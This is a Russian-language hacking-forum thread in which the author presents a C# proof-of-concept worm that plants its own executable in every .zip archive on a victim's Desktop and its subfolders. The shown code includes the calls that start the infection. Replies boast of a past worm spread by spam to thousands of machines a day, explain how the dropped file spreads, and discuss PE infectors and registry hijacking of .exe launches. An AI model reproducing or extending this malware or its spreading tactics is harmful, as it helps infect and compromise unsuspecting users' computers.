• XSS.stack #1 – первый литературный журнал от юзеров форума

Заражаем ZIP архивы [C#, PoC]

Отслеживать
V1rtualGh0st

V1rtualGh0st

(L3) cache
Пользователь
Регистрация
08.12.2018
Сообщения
228
Реакции
485
Гарант сделки
19
Депозит
0.00
Привет, скрипт-кидди брат. Сегодня я покажу тебе Proof-Of-Concept мини-червя, который добавляет себя во все .zip архивы.

Начнём.

Логика нашего червя:

  • Ищем все zip файлы в папке
  • Добавляем своё отродье в архив
  • Повторяем тоже самое со всеми файлами. (рекурсией)
Первым делом создадим новый метод, который будет принимать 2 аргумента - папку для заражения и файл, который будем добавлять в архив:

ed4591580d8fbc7ef2dd9.png


И создаём рекурсивный метод, который будет заражать все подпапки:
8412ad68a090b9e685dc3.png


C#: 
    string currentFilePath = Assembly.GetExecutingAssembly().Location,
                      desktopPath = Environment.GetFolderPath(Environment.SpecialFolder.Desktop);

Затем вызываем методы:

C#: 
    zipInfect(new DirectoryInfo(desktopPath), currentFilePath); // Заражаем архивы на рабочем столе
               recursiveInfect(desktopPath, currentFilePath); // И в подпапках

f0acbc74c5d6da8a20186.png


И теперь тестим:

e87cae03fc7dde7a3061a.png


0994be464677b9454f816.png


Как видим, в архивах появился наш файлик.

Источник.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Помню был червь в 15 году.
Сканировал все диски на наличие exe\txt\zip файлов.
После сканирования - создавал за место файла свой exe и удалял оригинал (перед этим взяв свойства оригинала. Иконка, название)
+ заражал все новые диски и сам себя распространял по почте (при отправке любой ссылки\файла отправлялся именно нужный нам файл)
Не помню уже его названия и не знаю на сколько он актуален на данный момент, но в те года мне удавалось делать по 5к инсталлов в день, уделив неделю на распространение ручками, через спам. (число инсталлов росло как снежный ком)
Может из олдов помнит кто название данного червя?
 
Какой вред нанесет к примеру мне?
Будут битые архивы у меня, или всё zip файлы можно будет слить?
В хаке подобном не силен, многое в этом формате пакую
 
MOKING сказал(а):
Какой вред нанесет к примеру мне?
Будут битые архивы у меня, или всё zip файлы можно будет слить?
В хаке подобном не силен, многое в этом формате пакую
Написано в описании ведь, друг, что добавляет просто твой файл во все найденные zip
V1rtualGh0st сказал(а):
  • Ищем все zip файлы в папке
  • Добавляем своё отродье в архив
 
KNOWNAME сказал(а):
Практическое применение данного способа остается в тайне.
А что тайного то?
Человек просто мб кому-то отправит зип архив в котором по его мнению будет отчет/лаба/нужный файл . а туда дропнется еще и экзешник, а потом хомяк какой-нибудь скачавший его архив , случайно или из любопытства откроет тот файл который дропнулся, вот тебе мини баф к spread зверька,как-то так) ну и + у тебя сорцы выше, можешь импровизировать и что-то еще сделать в плане spread'а
 
Интересный способ. Есть ещё способ заражения, что любые файлы при открытии запускают экзешник. Было бы интересно ещё и дописать свой экзешник в другие программы, чтобы при их запуске незаметно стартовал и свой файл. Тогда не нужно будет заботиться об автозагрузке. Знаю, что так можно, но не нашел реализации.
 
Marinad сказал(а):
Интересный способ. Есть ещё способ заражения, что любые файлы при открытии запускают экзешник. Было бы интересно ещё и дописать свой экзешник в другие программы, чтобы при их запуске незаметно стартовал и свой файл. Тогда не нужно будет заботиться об автозагрузке. Знаю, что так можно, но не нашел реализации.
Ты изобрел pe infector.
 
Marinad сказал(а):
Интересный способ. Есть ещё способ заражения, что любые файлы при открытии запускают экзешник. Было бы интересно ещё и дописать свой экзешник в другие программы, чтобы при их запуске незаметно стартовал и свой файл. Тогда не нужно будет заботиться об автозагрузке. Знаю, что так можно, но не нашел реализации.
Marinad сказал(а):
Не изобрел. Сейчас уже все возможные способы давно изобретены. Интересно было бы найти исходник этого действа.
Есть возможность в реестре винды менять значения на запуск *.exe файлов, при том что и оригинальный файл будет нормально отрабатывать)
 
V1rtualGh0st сказал(а):
Есть возможность в реестре винды менять значения на запуск *.exe файлов, при том что и оригинальный файл будет нормально отрабатывать)
Да, видел такой вариант. Через ShellExecute, вроде бы, как-то можно, попадалась статья.
 
AsHkERE сказал(а):
блет какой же бред инфектор этот, совершенно не боевой в 2020(для года так 2015 сойдет)
Так никто и не говорит, что инфектор ахуеный, выклал только ради ознакомления :(
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх